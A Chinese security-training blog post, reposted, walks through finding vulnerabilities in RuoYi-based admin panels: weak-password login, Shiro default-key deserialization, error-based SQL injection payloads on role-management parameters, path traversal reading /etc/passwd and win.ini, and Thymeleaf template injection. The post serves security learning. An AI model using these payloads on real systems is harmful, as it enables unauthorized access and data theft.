漏洞挖掘 | ruoyi框架管理系统漏洞

admin 2024年3月31日18:56:36评论24 views字数 1567阅读5分13秒阅读模式

扫码领资料

获网安教程

漏洞挖掘 | ruoyi框架管理系统漏洞

漏洞挖掘 | ruoyi框架管理系统漏洞
本文由掌控安全学院 - zbs 投稿

前言:

在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:
漏洞挖掘 | ruoyi框架管理系统漏洞
发现一个弱口令进去后:
漏洞挖掘 | ruoyi框架管理系统漏洞
【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】
漏洞挖掘 | ruoyi框架管理系统漏洞
看这界面,是不是很像ruoyi
插件一看:
漏洞挖掘 | ruoyi框架管理系统漏洞
前端vue.js
加上登录的cookie rememberMe:
漏洞挖掘 | ruoyi框架管理系统漏洞
【登录失败时bp抓包相应包有remeberMe=delete】
得知登录为shiro框架
八九不离十后台就是ruoyi框架的管理系统了

若依管理系统简介

若依管理系统(Ruoyi Admin System)是一款基于Java开发的开源后台管理系统,若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用Spring Boot框架。
找了个ruoyi系统的例图如下:
漏洞挖掘 | ruoyi框架管理系统漏洞

漏洞一:若依前台默认shiro key命令执行漏洞

漏洞简介
若依默认使用shiro组件,所以可以试试shiro经典的反序列化 rememberMe漏洞来getshell。
直接工具一搜哈:
漏洞挖掘 | ruoyi框架管理系统漏洞
直接先爆破密钥,成功了血赚,失败了不亏,还有其他方法能得到AES的key
工具二搜哈:
【url和cookie配置好就直接搜哈】
漏洞挖掘 | ruoyi框架管理系统漏洞
这里发现了很多的漏洞:
[+] 存在Snakeyaml命令执行漏洞[+] 存在JdbcTemplate漏洞[+] 存在ReadFile(新)文件读取漏洞[+] 存在ReadFile(老)文件读取漏洞[+] 存在Thymeleaf模板注入漏洞[+] 存在SQL(1)注入漏洞[+] 存在SQL(2)注入漏洞[+] 存在SQL(3)注入漏洞[+] 存在Shiro框架[+] 存在默认key:xxxxx
我们先针对shiro框架:
拿着key去工具一:
漏洞挖掘 | ruoyi框架管理系统漏洞
然后检测利用链,检测成功后就可以命令执行getshell了:
漏洞挖掘 | ruoyi框架管理系统漏洞
漏洞挖掘 | ruoyi框架管理系统漏洞

漏洞二:若依后台存在多处sql注入漏洞

第一处:

漏洞挖掘 | ruoyi框架管理系统漏洞
角色管理的搜索,bp拦截抓包:
漏洞挖掘 | ruoyi框架管理系统漏洞
poc:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
报错注入回显database():
漏洞挖掘 | ruoyi框架管理系统漏洞
poc2:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1),0x7e))
漏洞挖掘 | ruoyi框架管理系统漏洞
爆到库名点到为止

第二处:

漏洞挖掘 | ruoyi框架管理系统漏洞
也是角色管理,在导出这里
poc:params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
漏洞挖掘 | ruoyi框架管理系统漏洞
漏洞挖掘 | ruoyi框架管理系统漏洞
漏洞挖掘 | ruoyi框架管理系统漏洞

或者直接使用工具二

漏洞挖掘 | ruoyi框架管理系统漏洞
漏洞挖掘 | ruoyi框架管理系统漏洞

漏洞三:若依后台任意文件读取(CNVD-2021-01931)

直接get访问:
/common/download/resource?resource=/profile/../../../../etc/passwd/common/download/resource?resource=/profile/../../../../Windows/win.ini
漏洞挖掘 | ruoyi框架管理系统漏洞

漏洞四:Thymeleaf模板注入漏洞

用工具二 ping+dnslog验证:
漏洞挖掘 | ruoyi框架管理系统漏洞
漏洞挖掘 | ruoyi框架管理系统漏洞

.

漏洞挖掘 | ruoyi框架管理系统漏洞

原文始发于微信公众号(掌控安全EDU):漏洞挖掘 | ruoyi框架管理系统漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月31日18:56:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞挖掘 | ruoyi框架管理系统漏洞http://cn-sec.com/archives/2616571.html

发表评论

匿名网友 填写信息